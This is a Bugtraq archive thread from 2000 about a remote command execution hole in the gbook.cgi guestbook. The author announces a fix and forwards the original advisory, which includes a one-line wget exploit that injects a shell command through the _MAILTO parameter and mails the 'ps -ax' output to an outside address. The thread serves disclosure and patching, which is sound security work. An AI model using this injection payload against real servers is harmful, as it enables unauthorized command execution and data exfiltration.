Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick <nbs () SONIC NET>
Date: Sat, 11 Nov 2000 19:00:58 -0800

So far as I can tell, it's fixed...  Please let me know if anyone
sees any other glaring holes.  It IS rather ancient software.

-bill!

Forwarded message:
From mbrennen () fni com  Sat Nov 11 10:28:17 2000
X-envelope-info: <mbrennen () fni com>
Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
From: Michael Brennen <mbrennen () fni com>
To: William Kendrick <nbs () sonic net>
Cc: mat () hacksware com
Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
 (fwd)
In-Reply-To: <200011110920.eAB9KVL11974 () sonic net>
Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000 () henry fni com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


You might want to post this to bugtraq.

   -- Michael


On Sat, 11 Nov 2000, William Kendrick wrote:

Should be fixed, thanks.

I wonder why I wasn't informed directly!  My @zippy.sonoma.edu address
_should_ still be getting forwarded to my new addr.

New download available at:

  ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz

Modification date: November 11, 2000.

-bill!



Don't know if you saw this or not; you probably have by now.  There
are a couple of vulnerable sprintf() also that should be replaced by
snprintf().

   -- Michael


---------- Forwarded message ----------
Date: Fri, 10 Nov 2000 20:38:44 +0900
From: JW Oh <mat () IVNTECH COM>
To: BUGTRAQ () SECURITYFOCUS COM
Subject: [hacksware] gbook.cgi remote command execution vulnerability

   Bug Report

1. Name: gbook.cgi remote command execution vulnerability
2. Release Date: 2000.11.10
3. Affected Application:
  GBook - A web site guestbook
     By Bill Kendrick
     kendrick () zippy sonoma edu
     http://zippy.sonoma.edu/kendrick/
4. Author: mat () hacksware com
5. Type: Input validation Error

6. Explanation
 gbook.cgi is used by some web sites.
 We can set _MAILTO parameter, and popen is called to execute mail command.
 If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
 It's so trivial. :)
7. Exploits
 This exploit executes "ps -ax" command and sends the result to haha () yaho com 

 wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho 
com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () 
yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few";


=================================================
|               mat () hacksware com               |
|             http://hacksware.com              |
=================================================






  By Date           By Thread  

Current thread:
  • Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED] William Kendrick (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]